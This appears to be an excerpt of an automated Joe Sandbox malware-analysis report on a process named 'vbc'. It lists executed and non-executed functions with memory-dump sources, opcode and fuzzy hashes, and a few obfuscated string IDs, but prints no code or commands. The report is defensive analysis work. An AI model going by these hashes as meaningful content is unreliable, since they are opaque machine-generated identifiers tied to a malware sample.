                                                                                                    • Opcode ID: a9e8d88109059a3bffdadb9d03786fed2ffcf04dc5bf2a0b2735af651fd141ea
                                                                                                    • Instruction ID: df63a780076f8abf57c48d3b6b71eb4eaab7a984f07bae75d23530d0da86fec0
                                                                                                    • Opcode Fuzzy Hash: a9e8d88109059a3bffdadb9d03786fed2ffcf04dc5bf2a0b2735af651fd141ea
                                                                                                    • Instruction Fuzzy Hash: 9FC09B304481815FDB0147515D1D746FF14EF52715B0647C9D4555E493C36524CDD762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005211A0 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00521A30 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052AAC8 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005273E8 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00523C28 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005235D8 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00520718 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265740 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aaff9bdefbd3244fecfcd4f47431bc6f86223bc46fd38a9cbf39e66ff6257ea1
                                                                                                    • Instruction ID: 0f2823e7ed885c434e426b6621ebfe6e8343e3189288e35f4c3a67c050e9bf26
                                                                                                    • Opcode Fuzzy Hash: aaff9bdefbd3244fecfcd4f47431bc6f86223bc46fd38a9cbf39e66ff6257ea1
                                                                                                    • Instruction Fuzzy Hash: DBC08CE400D1C92EC2034B2488A03E0BF307F52009F0D11C5D0E4061A3CF005932EB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484CF10 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F71F8 Relevance: .0, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94301426506cf6c9d19fc59cb9f1bd95e28d82c98088ed5fed5fd30140c368d4
                                                                                                    • Instruction ID: afe5fbfd8ae1e3530c2d80c5233bd215ba052b251a454db9c4f40b96f76b71e7
                                                                                                    • Opcode Fuzzy Hash: 94301426506cf6c9d19fc59cb9f1bd95e28d82c98088ed5fed5fd30140c368d4
                                                                                                    • Instruction Fuzzy Hash: CAB0926522D1844BC285D710D992895FB61EBC2204B688A9DA8454B242CA23A95BDA05
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265D18 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80a8e1fe34aa6bbc171f0e814d9e7efeb31321290d335b4e1097cb489e72b752
                                                                                                    • Instruction ID: bcd54671a63e451b6763ce684ecb8065472388a37428f5625c07c415e6727313
                                                                                                    • Opcode Fuzzy Hash: 80a8e1fe34aa6bbc171f0e814d9e7efeb31321290d335b4e1097cb489e72b752
                                                                                                    • Instruction Fuzzy Hash: FDB012E41094C17FC301AF618870490BF347DB615A70890CDD0F903183CB029A33E784
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F7200 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1230 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9B4E Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0b9c1a5709a50534d782e38ea874923ae17f0e4dc1705a3f08ad3986a74b874a
                                                                                                    • Instruction ID: 4a2ca88e67363b39de868b81917e8257812485baff237036501e87b6780002ec
                                                                                                    • Opcode Fuzzy Hash: 0b9c1a5709a50534d782e38ea874923ae17f0e4dc1705a3f08ad3986a74b874a
                                                                                                    • Instruction Fuzzy Hash: C2A011A020A880ABC200CAA08CA0880BE203EA2008308808AA0A802082CB02AA22C380
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F95C0 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1740 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005220E0 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528DE0 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265750 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484F470 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484F6CD Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ecaf4bee6656a2c6e7e605fe5059b68fb622c385265963eb87425fd435e16670
                                                                                                    • Instruction ID: 7400386eec5f49716793c1d7e4a17bcaf05bf61e3e7cba662c2659691e78ddd1
                                                                                                    • Opcode Fuzzy Hash: ecaf4bee6656a2c6e7e605fe5059b68fb622c385265963eb87425fd435e16670
                                                                                                    • Instruction Fuzzy Hash: CCA012D11050405BC10086508860480AF9039A114031590C9D06401086CB015721C380
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484FFAE Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0b9c1a5709a50534d782e38ea874923ae17f0e4dc1705a3f08ad3986a74b874a
                                                                                                    • Instruction ID: 4a2ca88e67363b39de868b81917e8257812485baff237036501e87b6780002ec
                                                                                                    • Opcode Fuzzy Hash: 0b9c1a5709a50534d782e38ea874923ae17f0e4dc1705a3f08ad3986a74b874a
                                                                                                    • Instruction Fuzzy Hash: C2A011A020A880ABC200CAA08CA0880BE203EA2008308808AA0A802082CB02AA22C380
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484E7C0 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00261A80 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                    • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                                    • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                    • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DBA0 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                    • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                                    • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                    • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054F2B0 Relevance: .0, Instructions: 2COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 642dcad09028b5f6c26bae13b02e5dfff686720983438753a92e50b36e3094cd
                                                                                                    • Instruction ID: 5c92ad8999cc05cf3fa052bf2e5bc3366ecadc94924b07e4284a6540b6984cee
                                                                                                    • Opcode Fuzzy Hash: 642dcad09028b5f6c26bae13b02e5dfff686720983438753a92e50b36e3094cd
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 0026252C Relevance: 8.5, Strings: 5, Instructions: 2266COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 9L+K$Cqt`$UQ$pl>V$z-
                                                                                                    • API String ID: 0-3081535762
                                                                                                    • Opcode ID: 3d2072ffb6ff8d77bc34f9bc3eb8158aba7539062b7c13186445d09cca73d2c1
                                                                                                    • Instruction ID: 320a5e7f4a33039d808ace60d5debd98cdc1a126e4504114378fcd50f56fe1e9
                                                                                                    • Opcode Fuzzy Hash: 3d2072ffb6ff8d77bc34f9bc3eb8158aba7539062b7c13186445d09cca73d2c1
                                                                                                    • Instruction Fuzzy Hash: AF43B231D5072B8ACB119F608C446CAF372FFAA305F219795A9493B140EB716BDACF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484BE52 Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 48Zl
                                                                                                    • API String ID: 0-1881513071
